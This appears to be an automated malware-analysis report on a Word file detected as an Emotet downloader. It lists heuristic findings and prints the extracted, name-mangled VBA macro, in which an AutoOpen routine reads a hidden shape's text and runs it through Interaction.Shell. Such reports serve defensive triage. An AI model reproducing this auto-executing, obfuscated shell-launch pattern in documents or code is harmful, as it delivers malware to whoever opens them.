Verdict: MALICIOUS
Risk score: 252
Heuristics: 9
- ClamAV: Doc.Downloader.Emotet-6899225-0 (critical; rule CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6899225-0
- VBA macros detected (medium; rule OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical; rule OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `_ .Shell(iihfU, jChzFM), YXtwPRj) zISRQFrULdSlRZslbHilSOH = (242593722 + Round(JQShbkjFrQbBbDLOHUzGfIij) * 293021783 - wzNckBhRGpZmksijaIRjzE + (WLtHiUAhmpmlmrPjaU / Tan(zWpVkGXwiZOJouar)))`
- VBA p-code auto-exec with execution tokens (high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low; rule OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True Sub autoopen() shdSmRDc`
- Suspicious cmd.exe invocation with execution flag (high; rule SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium; rule OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4597 bytes |

macros.bas details:
- SHA-256: 265c9cf6c22a1e817af8fb92d806ed1d2511ba9fd43d6a92fe07a15d49daa20c
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely. 131 of 160 identifiers look randomly generated (e.g. 'jkpfXDfWtbhToiVjAlXpVfYZ'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "vTqErLCw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
shdSmRDc
End Sub
Attribute VB_Name = "HCHMtlFZj"
Function shdSmRDc()
On Error Resume Next
AwiaUizEQnGwuztfOmAWk = (205715811 + Round(YiUHYCTXluwdrGnN) * 155653977 - ZzunzzRvzVKSqAVlKr + (WbCzPVDwUCYbYdBKfQklXpcC / Tan(MSDvHFwwOAuXCiSuzztbtlpp)))
qVZGchwzzDCzCMwcfKcGmd = 250163150
EbnPRFYTtcAzfjwIkt = (191263656 + Round(TchIDOBwpiAsqJAIAz) * 147476688 - qukbcbOitdSdwRDbtfLCDZd + (cIHWinIkXmiZsFfb / Tan(XFMPXvZGYPVoUn)))
QZzUUsvFUiGKmijnz = 236723661
LOaKBwbGlcpzQfC = (28994865 + Round(PahdfAHzrIzpkt) * 166389160 - DXonYFSciduFcI + (uqMqOqffOSLKncQ / Tan(jQwMHNRbJIEuBF)))
WiCEzXDKMYsaVN = 312670286
nDwbiEnzHzHzcwGcfwi = (336938489 + Round(SiAjasQTTcNpBaRRFsD) * 71886539 - UwqJBYPzJKSIwUUzvDMXjoWt + (aVoLaGioiwmJXYTA / Tan(JRvjDFzTKornQjazzb)))
anjEnUUWioYfsX = 78080880
iriKFtWvwYscwcbjW = (322803382 + Round(FJGwPwnhMnYVPi) * 170113639 - zcKXmjwTkwDCobYNEJ + (FXuPLSLKIaCcwWIiELZ / Tan(WLnMSuktkOKRGCUzC)))
wEaYpshUFjfzTCir = 35725263
zSPASNXHPvYhHOfzGjrS = (7228865 + Round(MRvRHZSAMDIOThENCqpz) * 234944177 - NISwJRdVUWdVFwF + (FwpPiVZsuwvsdA / Tan(BuHEmwJPAXqilkwbGHBl)))
JUXsiZELVksTsbbwtSCwjp = 289355865
ZNobvoUzQrksPJnLDU = (212195589 + Round(SJuNZNGYuhbZCdaRGfroRj) * 118303093 - STJLdVlJMNBPSaCihvDiQLp + (jVFXcsZjrzuGDuvYwSMpbK / Tan(fdJGVfjiHdXcIPOjUoSXTfvi)))
AimwwAKYWZtTlDDIVncfSm = 59078559
Set zdXQr = vTqErLCw.Shapes(flIwQE + "GFtELIoGcL" + VzVDm)
iwnjQwpzHvwRjXMD = (225928437 + Round(tiSSlVLCwdYizRv) * 311475531 - fqMmmkZKcwMZhCCZ + (vvtPLSVNBMZZwhWoMjM / Tan(WGwtHIYwdObWIYVzBv)))
XrYkXAljPplVWpEEpw = 1816059
ZGTWHmbkNtujWM = (21398115 + Round(UkduKJJXowCSFqsnvfiN) * 84010373 - uAqtIuDGaHGYzObPpQwv + (LkJfWAGlripSoqcERAOTh / Tan(uLhtiLfpNQQwjQjNlu)))
VjYQFJXwKXPicAppzwdVuFBU = 167718962
Const jChzFM = 0
mupJWHcFOLlmSqXB = (260608324 + Round(nEidNUiJvnKBGqbDwZbCfqOH) * 307959119 - KAYqYKwIcWcJhViNMovNFuKO + (wZkTwqbiNJdkEPACzOFbosG / Tan(RiZMhuPqKwakNpfjAbT)))
AcHZuLHjEmDGTMBR = 110697699
kNOrOatGsIQDwrAitWAbDM = (127372426 + Round(YqsXmBkpsfwfsSwEcrLhOjF) * 128568140 - oQmjnnYtUTXhVT + (XbLSuVlbawzMAlfplZUwkwI / Tan(sYlYzYWHXUKnXmY)))
DpLkobXIodlIBVGZSGaWk = 82873495
XwtYDzCraoPYrdKMwAwWQlRE = (326469995 + Round(IzGtwPYqHkjjYicuHdjTPCpa) * 175837405 - bjflhobGqEkhsAABVafMbSt + (ioVdiGIjSBooKWDsIS / Tan(YJaliTNhPuOTIqJGtSzYkw)))
OrMMrzXnDIiUMD = 18122610
WrNsNkooFuTvEREYRqahw = (323795048 + Round(iJqHjtQLVfwizqaDCz) * 204040167 - UmswCzzbXHDlZXiiXcHvpiw + (GiEiqnXiTCzvQrFjv / Tan(nNcMJcLsjZrjFlocrTsPlk)))
USWXjRfXYzBvknuZcXwGw = 280417084
iihfU = zdXQr.TextFrame.TextRange + pWzRVn + iZaNY + tnaFpQ + XvTRBnN + zzfMph + ZARNCCk + MuRzfjKC + VznVV + oXdJmUPn
dwtKtGIcbJKzHdYPC = (10106445 + Round(zraZJklDaFMrQiM) * 242092869 - QasaXstpTFNAviTPiPXCXkZ + (ChXORuOusfzcIia / Tan(jkpfXDfWtbhToiVjAlXpVfYZ)))
SHPjrHEpZVmuujzCBVpMvGJ = 65188653
iKYhsXPDCNwsfQMAanKn = (102804067 + Round(aZwThRwQiUOcYLoOHA) * 335624877 - NXsHounXBNvIPJjwjZqzH + (iiiDrBLLfJofHDhrimdZOV / Tan(FMPcqfiKBcasOclDmLp)))
lUjCjRsvDUhXJFYqbZVjz = 339000062
AtDVwmczJRKKkoFb = (319978975 + Round(AsvfOcjOJpfXFiaIXHHa) * 217294863 - zCAOiNLCzIKwuJQUfalkdm + (lLbjbQwUWwMvtfAuVC / Tan(rXNIoRsCbjowKKh)))
CGdjmzonwhOWpfjPi = 153367847
UIPSDEaTruvEhWYGPazK = (90784784 + Round(EWXvBmWViwodAFcuwAju) * 331417452 - CfOOUwEOIXQpDsv + (CozVPwQEWTiVizi / Tan(jzUrjmSXQQqQMKBkwn)))
rzcsFPJsAUjkLtzJGXDbQVZF = 335054692
RrzahVVjzIrdCtszJVmkj = (167165372 + Round(sIGAWUAFqNdiVAfjt) * 95481615 - HodwcMmGdshkCrZF + (aVwPzCAQYPWzilsVS / Tan(dOMinkOWNJcbmvvMJ)))
PwKlcjDzQIzGoOjZvqG = 311681421
sLRuWqAmV = Array(EPcWu, DhjiWP, uMvMh, Interaction _
 _
 _
 _
 _
 _
 _
 _
 .Shell(iihfU, jChzFM), YXtwPRj)
zISRQFrULdSlRZslbHilSOH = (242593722 + Round(JQShbkjFrQbBbDLOHUzGfIij) * 293021783 - wzNckBhRGpZmksijaIRjzE + (WLtHiUAhmpmlmrPjaU / Tan(zWpVkGXwiZOJouar)))
qtCzFHnwzGwpKcrPq = 45135014
jEviACkNWMKNZVUFoYmUbCp = (7215191 + Round(GtmInffoAjudzRXUwdJFTUPk) * 25855011 - ijuSjPuitIwFjhfZZoZbqG + (zcZfvcliBEAwwuhAi / Tan(PYOVtucauvaLcvbUupGjw)))
HizBikifrousbiA = 194752238
LRCAaXmpVNtkOrp = (208016152 + Round(qrNzHWtBfINpPdcGXIz) * 305202819 - ktaPsUjkYbaHVCNHHDuI + (uPZzGjQirjqltFwmjPCKRHjn / Tan(taPwPEFlhpdBQllTFhrkW)))
zOUYnrwjnimRMIAjbfk = 339839145
End Function
```